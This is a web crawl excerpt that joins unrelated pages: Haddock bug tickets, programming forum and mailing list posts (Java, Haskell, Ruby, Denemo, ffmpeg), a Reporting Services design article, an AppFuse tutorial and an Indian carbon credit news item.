messages: /tmp/ghc18204_0/ghc18204_0.s:160:0: Error: .size expression for Main_main_entry does not evaluate to a constant /tmp/ghc18204_0/ghc18204_0.s:160:0: Error: .size expression for ZCMain_main_entry does not evaluate to a constant }}} This error can be solved by patching Haddock to use the equivalent of `-fasm`: {{{ diff -ur haddock-2.4.2/src/Haddock/Interface.hs haddock-2.4.2.new//src/Haddock/Interface.hs --- haddock-2.4.2/src/Haddock/Interface.hs 2009-03-21 12:22:17.000000000 -0700 +++ haddock-2.4.2.new//src/Haddock/Interface.hs 2011-08-16 20:25:31.551414886 -0700 @@ -97,9 +97,9 @@ modgraph' <- if needsTemplateHaskell modgraph then do dflags <- getSessionDynFlags - setSessionDynFlags dflags { hscTarget = HscC } + setSessionDynFlags dflags { hscTarget = HscAsm } -- we need to set HscC on all the ModSummaries as well - let addHscC m = m { ms_hspp_opts = (ms_hspp_opts m) { hscTarget = HscC } } + let addHscC m = m { ms_hspp_opts = (ms_hspp_opts m) { hscTarget = HscAsm } } return (map addHscC modgraph) else return modgraph #else }}}" JohnMillikin 4 None 183 """failed to parse haddock prologue from file"" error on module" defect new 2011-10-21T00:13:39Z+0100 2012-09-25T12:09:55Z+0100 . " jberryman 4 None 188 Haddock reorders multiple declarations on one line defect new 2011-11-13T13:30:59Z+0000 2012-09-25T12:09:55Z+0100 : " DavidAmos 4 None 189 Incorrect or at least misleading output with PolyKinds + TypeOperators defect new 2011-11-25T18:22:53Z+0000 2012-09-25T12:09:55Z+0100 None 191 Incorrect handling of character references defect new 2012-01-09T03:47:07Z+0000 2012-09-25T12:09:55Z+0100 ü - although &\#252; would achieve the same result in a simpler way. " selinger 4 None 203 very difficult to list pragmas in haddock code blocks defect new 2012-04-28T00:45:42Z+0100 2012-09-25T12:09:55Z+0100 | <% map toUpper ""hello, world!"" %>|] }}}." JeremyShaw 4 None 217 Remove import of Haddock.Types from the backends defect new 2012-10-10T03:33:57Z+0100 2012-10-14T14:57:43Z+0100 Replace it with a new exported module (say Documentation.Haddock.Types) so that external backends are not broken when types are added. hamish 4 None 71 Derive portability information from pragmas enhancement new 2009-01-15T21:31:20Z+0000 2012-09-25T12:09:55Z+0100 "It's too easy to write wrong Portability information in the Portability field of a module's haddock header. I wish that Portability information is automatically derived from a LANGUAGE or OPTIONS_GHC pragma, e.g. when no Portability field is specified. Somehow related to ticket #33. " haddock@… 4 None 82 Comments inside record field types enhancement new None 88 Sections in the midst of algebraic datatype definitions enhancement new None 91 Complexity annotations enhancement None new None 179 Reusing named chunks in other modules enhancement new 2011-09-12T00:48:58Z+0100 2012-09-25T12:09:55Z+0100 ." reinerp 4 None 201 Strip one leading blank from each line of a code block, if possible enhancement new 2012-04-12T08:11:32Z+0100 2012-09-25T12:09:55Z+0100 ." SimonHengel 4 None 215 vimhelp backend updated for ghc-7.4.2 enhancement new 2012-09-29T08:27:44Z+0100 2012-10-14T14:57:43Z+0100 " lars_e_krueger 4 None 219 No links from packages back to Haddock index enhancement new 2012-10-10T17:11:49Z+0100 2012-10-14T14:57:43Z+0100 "(NB: this ticket imported from a haskell platform ticket: )). (Not sure if the version of haddock is correct in this ticket)" MtnViewMark 5 None 73 file name does not match module name `Main' defect new 2009-01-23T18:04:33Z+0000 2012-09-25T12:09:54Z+0100 "At least an orthografical error: dependency graph. Furthermore, i don't understand the error: why haddock has to create a dependency graph?" anonymous 5 None 214 html themes are searched even if no html output has been requested defect new 2012-09-29T08:23:28Z+0100 2012-10-14T14:57:43Z+0100 "The offending line is src/Main.hs, line 230 themes <- getThemes libDir flags >>= either bye return If
http://trac.haskell.org/haddock/report/3?format=tab&USER=anonymous
CC-MAIN-2013-48
en
refinedweb
Actually, there are two Timer classes in the JDK. You and him are using two different classes. The code the OP isusing is correct for the Timer class he is using. With that said, he already posted this in another thread in this forum, at which I answered his question. No he is not using his Timer class correctly, and he should read the Java Doc. He imported import java.util.Timer;this the one he is using. He cannot use it in that way. You are thinking of javax.swing.Timer which he might want to use but is not using. He will get a compile error with his code because of an Invalid Constructor call. You did not need the unnecessary sub class. but if you did want to use it then you should have put this in the Timer constructor: time = new Timer(5,new TimerListener()); putting the this keyword means that nothing will be rendered due to the fact that in your actionPerformed method in the Board class was empty. Hope it helped Gen. You should actually avoid using 'this' in constructors because it is one of the conditions that can cause Java to leak because it's not fully initialized so it is best to get out of that bad habit. A subclass is a good way to avoid it, but a Factory is better but well beyond what he's doing. However, you're right he used the subclass incorrectly.
http://www.gamedev.net/index.php?app=forums&module=extras&section=postHistory&pid=4904126
CC-MAIN-2013-48
en
refinedweb
Luke Palmer wrote: > This does not answer your question, but you can solve this problem without > rewrite rules by having length return a lazy natural: > > data Nat = Zero | Succ Nat > > And defining lazy comparison operators on it. And if you want to go that route, then see Data.List.Extras.LazyLength from list-extras[1]. Peano integers are quite inefficient, but this library does the same transform efficiently. [1] > Of course you cannot replace usages of Prelude.length. But I am really not > in favor of rules which change semantics, even if they only make things less > strict. My argument is the following. I may come to rely on such > nonstrictness as in: > > bad xs = (length xs > 10, length xs > 20) > > bad [1..] will return (True,True). However, if I do an obviously > semantics-preserving refactor: > > bad xs = (l > 10, l > 20) > where > l = length xs > > My semantics are not preserved: bad [1..] = (_|_, _|_) (if/unless the > compiler is clever, in which case my semantics depend on the compiler's > cleverness which is even worse) Data.List.Extras.LazyLength does have rewrite rules to apply the lazy versions in place of Prelude.length where it can. My justification is two-fold. First is that for finite lists the semantics are identical but the memory behavior is strictly better. Second is that for non-finite lists the termination behavior is strictly better. It's true that refactoring can disable either point, and that can alter semantics in the latter case. Since the module is explicit about having these rules, I would say that users should remain aware of the fact that they're taking advantage of them or they should use the explicit lengthBound or lengthCompare functions instead. -- Live well, ~wren
http://www.haskell.org/pipermail/haskell-cafe/2008-December/052108.html
CC-MAIN-2013-48
en
refinedweb
89 Posts Tagged 'Ruby' Vim: fun with filters Vim lets you pipe text through an external filter. There are some obviously nice ways to use this in Linux, like :!sort | uniq which will sort all your lines, and then get rid of duplicate lines. But you can do things that are much more sophisticated if you write your own scripts which read from STDIN and output something back to STDOUT. For example I wrote this Ruby script. #!/usr/bin/ruby del = %r{#{Regexp.escape ARGV[0]}} if ARGV[0] del ||= %r{\s+} STDIN.each do |line| puts '(' + line.strip.gsub(/'/,"''").split(del,-1).collect{|x| "'#{x}'"}.join(',') + '),' end This will take a line full of delimited fields, escape all the single-quotes, split into fields on the delimiter, wrap each field in single-quotes, put commas between the fields, wrap each line in (), and put a comma at the end of the line. You can either specify a delimiter, or don't specify one and it'll default to splitting on whitespace. I use this to turn a delimited ASCII file of data into a form suitable for an INSERT command in SQL. So if I start with this: bob|2|3|Some description chester|1|4|Another description sarah|99|0|Let's try an apostrophe and run this in Vim: :%!sql_wrap.rb '|' I get this: ('bob','2','3','Some description'), ('chester','1','4','Another description'), ('sarah','99','0','Let''s try an apostrophe'), Or consider another simple example. This script will HTML-escape text: #!/usr/bin/ruby require 'cgi' STDIN.each do |line| puts CGI::escapeHTML(line) end</pre> So it'll turn this: Is 5 > 3? Yes, & isn't that neat? into this: Is 5 > 3? Yes, & isn't that neat? RubyFacets Today I found a really neat site, RubyFacets. Reminds me a bit of Perl's List::Util and List::MoreUtils; it's a bunch of methods to extend core classes in interesting ways. A while back I posted about a way to prevent Ruby from raising an exception when trying to access an un-initialized subarray of a multidimensional array by extending NilClass. At RubyFacets I found something arguably more interesting: auto-initializing sub-hashes of a multi-dimensional hash. The code: def self.auto(*args) leet = lambda { |hsh, key| hsh[key] = new( &leet ) } new(*args,&leet) end</pre> It took me a couple minutes to figure out what this is doing. The standard new method for class Hash takes a block; if you reference an uninitialized hash element (via the [] method) that block will be called, which presumably assigns the element a default value (thought it doesn't have to). The above method assigns a default value to any uninitialized Hash elements referenced via []. The default value is a new Hash object. The new Hash object's constructor is also passed a block which assigns new Hash objects to uninitialized Hash elements. You can see above that the "leet" anonymous function contains a reference to itself. I find that mighty clever. This lets you do crazy things like h = Hash.auto h['a']['lot']['of']['dimensions'] = true and you'll get hashes the whole way down. Lisp, part 2 Ruby date enumeration The Date class in ruby provides an upto method, so you can iterate over a series of dates. Date.new(2000,1,1).upto( Date.new(2001,1,1) ) do |d| puts d end This counts by days, so it will print 365 values or so from 2000-01-01 to 2001-01-01. What if you want to count by months? Being able to modify classes in Ruby makes this easy enough. Not sure this handles all situations, but it worked for what I needed. class Date def +(n) if n == 0 then return self elsif self.month + n > 12 return Date.new( self.year + (n.to_f / 12).ceil, (self.month + n) % 12, self.day ) else return Date.new(self.year, self.month + n, self.day) end end def upto(max) date = self until date > max do yield date date = date + 1 end end end Date.new(2000,1,1).upto( Date.new(2001,1,1) ) do |d| puts d end Ruby > Perl A while back I stopped coding in Perl and starting using Ruby for mostly everything. Today I had occassion to use Perl again, because there's no good working equivalent to Perl's Spreadsheet::WriteExcel that works well in Ruby; this Ruby spreadsheet package is a bit too buggy. (It's not my choice to use Excel, but they're paying me to use it. I can't complain. Well, I can complain here I guess. And will.) One thing I notice about Perl is that Perl sure does give your fingers a workout. I looked at the fairly simple 103-line Perl script I wrote, and it has exactly 118 dollar signs. That's a lot of Shift-$ finger reaching, if you think about it. Ruby doesn't even use curly braces around blocks; it uses do and end, which type quite nicely. Ruby does use a lot of pipes, but I can easily do a one-handed Shift-| maneuver if I lift my right hand off the home row. Think of the potential gains I will have when I'm older from the avoidance of arthritis alone. Try to come up with a more petty gripe than this. I dare you.. Theseus and the Minotaur Here's a little Java game that I found pretty entertaining. When I got to the sixth puzzle I decided to see if I could write a program to solve these kinds of puzzles. I did; here it is in Ruby, featuring OOP goodness and a bit of recursion, but otherwise just brute force. It only takes about .04 seconds to solve maze 9. It doesn't find an optimal solution; it tends to have Theseus wander around like a drunkard. Maybe it could be improved with heuristics, but I couldn't think of one. "Move towards the goal" doesn't work in general, because Theseus has to backtrack a lot on purpose to strand the Minotaur behind walls. It'll save one or two moves at most. "Move away from the Minotaur" or "Move toward the Minotaur" don't work because both are necessary many times. So I don't know. I only tried it on puzzle 6-9, but it seems to work. FlashGot I'm likely the last person in the world who heard of FlashGot, but better late than never. FlashGot is a Firefox plugin that lets you integrate with an external download manager program. It also lets you download every link on a page via a single menu command, which is either nice or overkill, depending on what you want to do. Linux doesn't have many (any?) good download managers. There's D4X, but I never cared much for it. I installed GWGET but FlashGot didn't auto-recognize it, and I'm not going through any trouble to get it working. However I still find FlashGot incredibly useful, for one reason: You can use a custom downloader executable. FlashGot will then call the executable and pass it the download URL as a command line argument. You can also pass other arguments (read about them all here) but the URL is all I really need. The downloader I use is a simple Ruby script I wrote myself which calls wget. What's the point of this, you ask? Well, you can do some neat things like: - Filter your downloads into directories by filetype, filename, source website, or any criteria at all. - Spawn massive numbers of parallel downloads with a single click. (Probably not a good idea to hammer servers too much with this though, it's not nice.) Use all the power of wget, which includes: custom timeout duration* download retrying* download resuming* filename timestamping* download speed throttling* FTP suport* (perhaps my favorite) GOOD filename collision resolution, so if you download a file called 1.png and then download a file called 1.png from a different site, wget will save the second one as 1.png.1. This something I miss from Safari. Firefox by default tends to ask you if you want to overwrite the old file, which gets very annoying very quickly. You could even conceivably crawl a web page or do recursive downloads. Let's say you want every MP3 you download to go into a "music" folder, every PNG you download to go into a "Pictures" folder, and ignore all other files. You could do something extremely simple like this (which I just wrote in 5 minutes and haven't tested): #!/usr/bin/ruby require 'fileutils' begin ARGV.each do |arg| dir = '' if arg =~ /mp3/i then dir = '/home/chester/music' elsif arg =~ /png/i then dir = '/home/chester/pictures' else dir = nil end if dir then FileUtils.mkdir(dir) unless File.directory?(dir) Dir.chdir(dir) do `wget #{arg}` end end end rescue Exception => e # If you want to see the output # when the script crashes, you # could log it here. raise e end Point FlashGot to this script and when you "FlashGot All", all linked PNGs and MP3s on a site will be downloaded and sorted, and all other links will be ignored. This would be very useful if you want to grab a whole page of wallpapers for example. Shoot.
http://briancarper.net/tag/95/ruby?p=9
CC-MAIN-2013-48
en
refinedweb
I will fix the keysig thing tonight. I will take out the mode option. A user requested it several years ago but I dont think its necessary and it complicated the code. Eventually I would like to see all dialogs written in scheme rather than c. We could script it now without the use of any gtk widgets by having menu items for each key in subdirectories like key->set initial->d major. Then possibly a popup can ask if you want all staffs. Then these keychanges can be recordable actions. What do you think? Jeremiah Sent from my Samsung smartphone on AT&T Richard Shann <address@hidden> wrote: >I have checked the screenshot stuff, working for gtk2 but disabled for >gtk3. >It turns out that the gtk3 code cannot be easily back ported to gtk2, so >I have both versions in screenshot.c >The gtk3 version is surrounded by #if 0 ... #endif as I have not been >able to compile it, and it is almost sure not to work even if it >compiles as it is just an initial hack of the gnome-screenshot code from >gtk3. >Can you check that this branch still compiles for gtk3 please? There are >only two issues with running the gtk3 branch version on gtk2 that I have >found so far > * Initial Keysignature dialog broken > * Horizontal scroll bar jammed wide open >I haven't looked at the DenemoGraphic stuff yet. > >Richard > > >On Thu, 2011-11-24 at 11:16 -0600, Jeremiah Benham wrote: >> Sure, >> >> > > > >> >> > >> >> > >> >> > >> >> > _______________________________________________ >> >> > Denemo-devel mailing list >> >> > address@hidden >> >> > >> >> >> >> >> >> >> >> _______________________________________________ >> >> Denemo-devel mailing list >> >> address@hidden >> >> >> > >> > > >
http://lists.gnu.org/archive/html/denemo-devel/2011-11/msg00061.html
CC-MAIN-2013-48
en
refinedweb
Would I be able to set it to "Desktop/GreatWall.JPG". Would that work if the image is there? Type: Posts; User: Leonardo1143 Would I be able to set it to "Desktop/GreatWall.JPG". Would that work if the image is there? import java.awt.BorderLayout; import java.awt.event.ActionEvent; import java.awt.event.ActionListener; import javax.swing.ButtonGroup; import javax.swing.ImageIcon; import javax.swing.JFrame;... How would I do the latter? just put in (double r)? Here is what my compiler is telling me: GeometryCalculator.java:20: error: constructor Sphere in class Sphere cannot be applied to given types; Sphere sp = new Sphere(r); ^... Nvm fixed that one too --- Update --- Alright my code compiled without a problem. Thank you guys --- Update --- I'm having some trouble. Right now it's just that the compilier is telling me it cannot find the symbol Grades.java:10: error: cannot find symbol ArrayList<Integer> Grades = new... Sorry I was doing this on a website. It messed up when I moved it here. But I fixed the problem. public boolean sum28(int[] nums) { int [] sum28 = {10,2,2,2,2,50}; int sum; for (int i=0; i<sum28.length; i++) //This will cycle through the elements { if (sum28[i] == 2) //If... Oh sorry for ambigious in my first post. But What I was wondering is how to loop it, effectively, and what are the coordinates. For example (x,x,x,x). What do each of those x's represent when i want... import javax.swing.*; import java.awt.Graphics; import java.awt.Color; public class MyDrawing_Start extends JFrame { public MyDrawing_Start() { add (new MyPanel()); } public static... Okay, now i am bit confused. So I may just go the longer route and just individually label the parts I need for my algorithm to work (armor,combat level,etc). Thanks for trying though. Oh okay so using 10 for my example should fix it? I chose 27 because it was used in the example That was the whole error message and No I don't know what the radix was I was basing it off the API's example. I thought the second arg,27, was for radix? The API used that as an example. "Exception in thread "main" java.lang.Error: Unresolved compilation problem: at... Armor = parseInt("Armor", 27) like that? So how would I go about assigning the string value of armor to an int? Like I said parseInt("Kona", 27) returns 411787 returns a value but when I try parseInt("Armor", 27) Okay I read it and don't completely understand it. If I have a string value, like armor, Do i put it in like this? Integer.parseInt(Armor); ... Where would I find the API document? Sorry it seems I was supposed to use "Integer.parseInt()". But how would I go about changing something like armor, a string, to 25, an int value, using this? Exception in thread "main" java.lang.Error: Unresolved compilation problem: The method parseInt(JTextField) is undefined for the type new ActionListener(){} at... import javax.swing.*; import java.awt.event.*; import java.util.Random; public class SimpleWindow extends JFrame { JLabel... Thank You, Norm. I got it to work thank you for being so patient with me. Oh. I think I'm getting it. Remove setText(). from the method and move into the action listener only? Okay which line of code is calling the setText()? I can't see it? Because I thought I needed to place getText in order for the setText to be called. I'm guessing this is wrong?
http://www.javaprogrammingforums.com/search.php?s=fc37a907315bd29feb8952ce58d69be3&searchid=685649
CC-MAIN-2013-48
en
refinedweb
Report Design Tips and Tricks SQL. Contents Introduction Best Practices and Tips Report Samples For More Information Introduction? Note This document assumes that the reader is familiar with the Reporting Services product, report design concepts, and possesses a basic knowledge on how a report is processed and managed by the report server.: - Optimize report queries.. - Retrieve the minimum amount of data needed in your report.. Rendering Formats. Pagination. Choose Appropriate Rendering Formats Control Page Size Controlling page size in the report not only changes the report layout, it also impacts how the report is handled by the Report Processing and Rendering engine. There are three types of page breaks: logical page breaks, soft page breaks, and physical page breaks. Logical). Soft Page Breaks. Physical Page Breaks. Check Reporting Services Log Files When you experience problems with report execution or need to interpret the performance characteristics of your reports, check the log files described in this section. Reporting Services uses these log files to record information about server operations and status. Windows Application. - Error information. Report Server Execution Log. Use Device Info to Control the Behavior of a Rendering Extension. HTML). PDF/Image. Office Excel. XML. Use a Multivalue Parameter Inside a. - Change the RDL namespace: - Remove the following elements entirely if present in the RDL file: - To remove all occurrences of interactive sort in the RDL file, remove all <UserSort> elements, including the inner contents. Report Samples.. Dynamic Field Based on Parameter, Dynamic Grouping::) Dynamic Columns -: Dynamic Page Breaks -:) Resetting the Page Number on a:. Horizontal Tables))
http://technet.microsoft.com/en-US/library/bb395166(v=sql.90).aspx
CC-MAIN-2013-48
en
refinedweb
- how powerful the manged c++ from .net is? - Function Self-Call error - gernerating sound from motherboard - Generic function - Questions - binary file i/o -- why doesn't this work? - File Loading - namespace tm? - A question about class members and constructors - OpenMP question - vector and pairs - Casting int to enum problem - Returning info from "system()" - reference to *this in initialization list? - problem in binary search - Passing .Net Bitmap to C++ Dll - couting output to a secondary console window - Template metaprogramming, whats the point? - Can I use string or chars in a switch? - Registry, Regedit - more precise version of clock() function - What's a permuted index? - Overloading a priority queue - GDB and inheritance - Problem
http://cboard.cprogramming.com/sitemap/f-3-p-237.html?s=347db66d120a8b30fd506712af01a4d2
CC-MAIN-2013-48
en
refinedweb
Diego Biurrun wrote: > On Sun, Aug 02, 2009 at 10:54:57AM +0300, Christian P. Schmidt wrote: >> Attached a second attempt at adding the support for LPCM streams in mpeg transport streams. > >> +#if CONFIG_DECODERS >> +#define PCM_MPEG_DECODER(id,name,long_name_) \ >> +AVCodec name ## _decoder = { \ >> + #name, \ >> + CODEC_TYPE_AUDIO, \ >> + id, \ >> + sizeof(PCMDecode), \ >> + pcm_mpeg_decode_init, \ >> + NULL, \ >> + NULL, \ >> + pcm_mpeg_decode_frame, \ >> + .sample_fmts = (enum SampleFormat[]){SAMPLE_FMT_S32, SAMPLE_FMT_NONE}, \ >> + .long_name = NULL_IF_CONFIG_SMALL(long_name_), \ >> +}; >> +#else >> +#define PCM_MPEG_DECODER(id,name,long_name_) >> +#endif >> + >> +#define PCM_CODEC(id, sample_fmt_, name, long_name_) \ >> + PCM_ENCODER(id,sample_fmt_,name,long_name_) PCM_DECODER(id,sample_fmt_,name,long_name_) >> + >> +/* Note: Do not forget to add new entries to the Makefile as well. */ >> +PCM_MPEG_DECODER(CODEC_ID_PCM_BLURAY, pcm_bluray, "PCM signed 16|20|24-bit big-endian"); > > I don't think it makes sense to use a macro for one declaration. Agreed. The macro is there to easily move pcm_dvd here in the next phase. The PCM_CODEC macro is a copy&paste leftover and will be removed - I can't encode without complete knowledge of the meaning of the remaining bits. Will fix the other issues (codingstyle, whitespaces). Regards, Christian
http://ffmpeg.org/pipermail/ffmpeg-devel/2009-August/060543.html
CC-MAIN-2013-48
en
refinedweb
This patch set is the final step towards to making LockD network namespaceaware.I can't prove, that this patch set is enough for NFSd (just haven't try), byLockd works fine and patches for it will be send soon.The following series consists of:---Stanislav Kinsbursky (4): SUNRPC: clear svc pools lists helper introduced SUNRPC: clear svc transports lists helper introduced SUNRPC: service destruction in network namespace context SUNRPC: service shutdown function in network namespace context introduced include/linux/sunrpc/svcsock.h | 2 +- net/sunrpc/svc.c | 36 +++++++++++++++++++++----------- net/sunrpc/svc_xprt.c | 45 ++++++++++++++++++++++++++++------------ 3 files changed, 56 insertions(+), 27 deletions(-)
http://lkml.org/lkml/2012/1/25/134
CC-MAIN-2013-48
en
refinedweb
What is the appfuse Advertisements Matt Raible are Appfuse developed a guiding entry-level J2EE framework, how to integrate its popular Spring, Hibernate, ibatis, struts, Xdcolet, junit, etc. give the basic framework of the model, the latest version 1.7 is provided on Taperstry and JSF support. In the persistence layer, AppFuse uses Hibernate O / R mapping tools (); in containers, it uses Spring Framework (). Users can freely select Struts, Spring / MVC, Webwork, Taperstry, JSF several web framework. The use of TDD development mode, the use of JUnit tests on each floor, and even test jsp output w / o error. In order to simplify the development of a set of predefined good directory structure, base class, used to create databases, configure the Tomcat, the deployment of applications to test Ant tasks to help Express automatically generated source code and automatic maintenance of some configuration files. References: At https: / / appfuse.dev.java.net / can download Appfuse, the current version is 1.7. Appfuse reference materials and documentation can view. Second, Appfuse Framework Quick Start AppFuse project's main objective is to help developers reduce the time a project at the beginning of the work to be done. The following is a use it to create a new project of the basic steps: 1, download or from CVS (cvs-d: pserver: [email protected]: / cvs co appfuse) detected in the latest version of appfuse source. 2, install J2SE 1.4 +, set the JAVA_HOME environment variable correctly, install Ant 1.6.2 +, set the ANT_HOME environment variable. 3, the installation of MySQL 3.23.x + (recommended version 4.1.7) and Tomcat 4.1.x + (recommended version 5.0.28), set the CATALINA_HOME environment variable to point to your Tomcat installation directory. Note: If you are ready to use MySQL 4.1.7, then you must be the default character set is set to UTF-8 character set and its default table type to InnoDB type. In other words, you want in your c: \ Windows \ my.ini or / etc / my.cnf file add the following lines: [mysqld] default-character-set = utf8 [mysqld] default-table-type = innodb 4, install a local SMTP server, or if you already have an available SMTP server, you can modify the mail.properties (in web / WEB-INF / classes directory) and build.properties (in the root directory -- - information for log4j) to point to your SMTP server - by default it is the point to your local SMTP server. 5, lib/junit3.8.1/junit.jar documents will be copied to the $ ANT_HOME / lib directory. 6, the implementation of ant new-Dapp.name = YOURAPPNAME-Ddb.name = YOURDBNAME command. This will create a file called "YOURAPPNAME" directory. Warning: the order for some values will not implement the app.name - Do not use "test", containing "appfuse" in the name of one of you, or any figure, two book No. (-) and so on mixed up the names of . 7, to the new directory, the implementation of ant's mission to create a database setup, at the same time your application will be posted to the Tomcat server. Only when the root of your password database user does not have the mission will work. You can also open in the time required to change the build.properties file root user's password. If you want to test and would like to know whether all were able to work well, then you can run ant the test-all mission to conduct a comprehensive test - of course the premise that when you first make the time to test Tomcat server to stop. 8, implementation of test-reports of ant mission - when the mission after the implementation, there will be a message to tell you how to view those generated test reports. When you sure you step through the above-configured your development environment after the AppFuse - below you need to do is study guide to learn about how to use AppFuse for your development. Optional installation If you are willing to choose to use iBATIS as the persistence layer framework for you, please take a look specifically extras / ibatis directory README.txt file. If you are willing to choose to use Spring as your WEB layer framework, please take a look specifically extras / spring directory README.txt file. If you are willing to choose to use WebWork as your WEB layer framework, please take a look specifically extras / webwork directory README.txt file. Choose if you are willing to Tapestry as your web tier framework, please take a look specifically extras / tapestry directory README.txt file. If you are willing to select JSF as your web tier framework, please take a look specifically extras / jsf directory README.txt file. If you want you can through the script to automatically complete the creation and testing, you can refer to the following script: rm-r .. / appfuse-spring ant new-Dapp.name = appfuse-spring-Ddb.name = ibatis cd .. / appfuse-spring ant install-ibatis install-springmvc cd extras / ibatis ant uninstall-hibernate cd ../.. ant setup ant test-all test-reports If you do not want to install iBATIS, Spring MVC or WebWork, you will be in your items before the warehouse code control, you should remove them in extras directory of the installation content. -------------------------------------------------- ------------------------------ Typically, when you have completed all of the above steps and they can work, the most likely thing you would want to put "org.appfuse" package names changed to a similar "com.company" this kind of package names. Does this matter now has been very easy, all you need to do is to download a package of tools, take a look at its README file, in order to understand its installation and use. Note: before you use this tool it is best to do your project will be a backup to ensure it is able to resume. If you will read org.appfuse.webapp.form packages such as test.web.form such a package name, you have to go simultaneously tinkering src / service package ConverterUtil category, getOpposingObject Ways are your friends, let us look at click: name = StringUtils.replace (name, "model", "webapp.form"); name = StringUtils.replace (name, "webapp.form", "model"); Three, AppFuse Development Guide If you have already downloaded and AppFuse want in your machine to install it, you'd better get started quickly in accordance with the steps to install. Once you have installed all of the content, the following guidelines are studying how to use AppFuse you develop the best tutorials. NOTE: AppFuse guide the development of the release contains a version of same, if you want to update your copy that works (which in the docs directory), can be through the implementation of "ant wiki" to complete. For AppFuse 1.6.1, you can tell in this Guide Ways to generate most of your code. If you're using Struts + Hibernate such a combination, you can even generate them completely. And if you select the web tier framework of the Spring or WebWork is not so fortunate for them to write an automated installation scripts exist many difficulties, so you have to configure it yourself Controllers and Actions of those. This is mainly because I do not have the framework of these web layer using XDoclet, but also because of the use of Ant tools as the limitations caused by the installation tool. A tool for automatic generation of code called me AppGen, I explain in Part I of how to use it. Part I: in AppFuse to create new DAOs and Objects - This is a about how to create a table based on data for the Java object and thus how to create Java persistent object category to the database in the tutorial. 1, with regard to this guide: This guide will show you how to create a new database table, and how to access the table to create Java code. We will create an object and some other categories to this object will be persistent (save, load, delete) to a database. Using Java language, we call this object is a POJO object (Plain Old Java Object), this object is basically a database tables are corresponding to the other categories will be: A data access object (also known as a DAO), an interface, implementation of a Hibernate type. A JUnit class to test whether the U.S. DAO job correctly. Note: If you are using MySQL and if you want to use the Service (Generally you will certainly choose to use), then you must be table-type set to InnoDB. You can do so, add the following contents of your mysql configuration file (/ etc / my.cnf or c: \ Windows \ my.ini) Medium. The second set (used to set UTF-8 character set) mysql 4.1.7 + are required. [mysqld] default-table-type = innodb default-character-set = utf8 If you use PostgreSQL Batch confusion encountered an error, you can try in your src / dao / ** / hibernate / applicationContext-hibernate.xml add 0 configuration file to turn off the batch. AppFuse using Hibernate as its default persistence layer. Hibernate is an object-relational mapping framework, which allows you to your Java objects and database tables to establish a mapping. So you can easily implement your object CRUD (Create, Retrieve, Update, Delete) operations. You can use the same iBATIS persistence layer as another possible choice. If you want to AppFuse install iBATIS, look extras / ibatis directory README.txt file. If you want to use iBATIS to replace Hibernate, I hope you are have enough reason and you should be familiar with it. I also hope that you can on how to use iBATIS in AppFuse-based guide to make good recommendations. ;-) I will use the following language to tell you the actual development process is how I do. Let us start at AppFuse project structure to create a new object, a DAO and a test case to start. Table of Contents [1] to create a new Object and add XDoclet tags [2] the use of Ant, based on our new object to create a new database table [3] to create a new order for DAOTest to JUnit test DAO [4] to create a new DAO object for the implementation of our CRUD operations [5] for the Person object and configure the Spring configuration file PersonDAO [6] to run test DAOTest [1] to create a new Object and add XDoclet tags We need to do first thing is to create an object go of it lasting. Let us create a simple "Person" objects (to create the src / dao / ** / model directory), we let it have an id, a firstName and a lastName (as the object of property). package org.appfuse.model; public class Person extends BaseObject ( private Long id; private String firstName; private String lastName; / * Generate your getters and setters using your favorite IDE: In Eclipse: Right-click -> Source -> Generate Getters and Setters * / ) This class should be inherited from BaseObject, because BaseObject has three abstract methods: (equals (), hashCode () and toString ()), so you have to type in the Person of their implementation. The first two methods are required by Hibernate, the simplest way is to use tools (such as: Commonclipse) to complete it, if you want to know about using this tool more information you can go to find the website of Lee Grey. Another tool you can use are Commons4E, it is an Eclipse Plugin, I have not used, so I can not tell you what features it has. If you are using IntelliJ IDEA, you can generate equals () and hashCode (), but can not generate toString (), of course, have a ToStringPlugin, but I have never personally used. Now we have a good create a POJO, we need to add XDoclet tags inside it in order to generate Hibernate mapping file. This mapping file is to allow Hibernate to map objects to tables, maps to the property listed in the table. First, we add a @ hibernate.class tags, the tags tell Hibernate mapping which this object will be a table: / ** * @ Hibernate.class table = "person" * / public class Person extends BaseObject ( We must also add a primary key mapping, otherwise, when the generated mapping file when an error will occur XDoclet. Attention to all of these @ hibernate .* tags should be placed in your POJO object getter methods Javadocs location. / ** * @ Return Returns the id. * @ Hibernate.id column = "id" * Generator-class = "increment" unsaved-value = "null" * / public Long getId () ( return this.id; ) I use a generator-class = "increment" in lieu of generate-class = "native", because I found that when the database in some other use "native" when there are some problems. If you only intend to use MySQL, I recommend you use "native", and our guide to the use of the "increment". [2] the use of Ant, based on our new object to create a new database table You can by running "ant setup-db" to create the person table. On the one hand, this task will be to create Person.hbm.xml create documents, on the other hand, can be in the database to create a "person" table. From the ant console, you can see Hibernate to create the table for your model: [schemaexport] create table person ( [schemaexport] id bigint not null, [schemaexport] primary key (id) [schemaexport]); If you want to see what Hibernate generated Person.hbm.xml for your document, you can go build / dao / gen / ** / model directory of view, I have listed the contents of the following: "- / / Hibernate / Hibernate Mapping DTD 2.0 / / EN" ""> Original connection: Related Posts of What is the appfuse ... Spring jar package Detailed AspectJ directory are in the Spring framework to use AspectJ source code and test program files. AspectJ is the first java application framework provided by the AOP. dist directory is a Spring release package, regarding release package described below in ...
http://www.codeweblog.com/what-is-the-appfuse/
CC-MAIN-2013-48
en
refinedweb
02 April 2007 17:14 [Source: ICIS news] NEW DELHI (ICIS news)--India’s Navin Fluorine International Limited has secured approval to generate tradeable carbon credits by reducing emissions of greenhouse gases (GHGs) equivalent to 2.8 million tonnes/year of carbon dioxide. ?xml:namespace> The company said on Monday that the clean development mechanism (CDM) executive board of the UN Framework Convention on Climate Change (UNFCCC) had registered its CDM project. Navin Fluorine earlier obtained approvals from the Indian Government and an independent international project validation entity. The company initiated the CDM project last year by deploying the GHG emission reduction technology of the UK's Ineos Fluor?xml:namespace> When completed in mid-2007, the project would prevent emission of hydroflorocarbons23 (HFC23), a by-product generated during the manufacture of refrigerant HFC22 at its Bhestan plant in Formerly Polyolefins Rubber Chemicals Limited, Navin Fluroine is It manufactures bulk chemicals such as anhydrous hydrofluoric acid and aluminium fluoride, specialty chemicals such as phenyl trimethyl ammonium chloride and n-methyl n-benzyl aniline at Bhestan and at Dewas in Madhya Pradesh
http://www.icis.com/Articles/2007/04/02/9017990/indias-navin-flourine-prepares-for-carbon-trading.html
CC-MAIN-2013-48
en
refinedweb
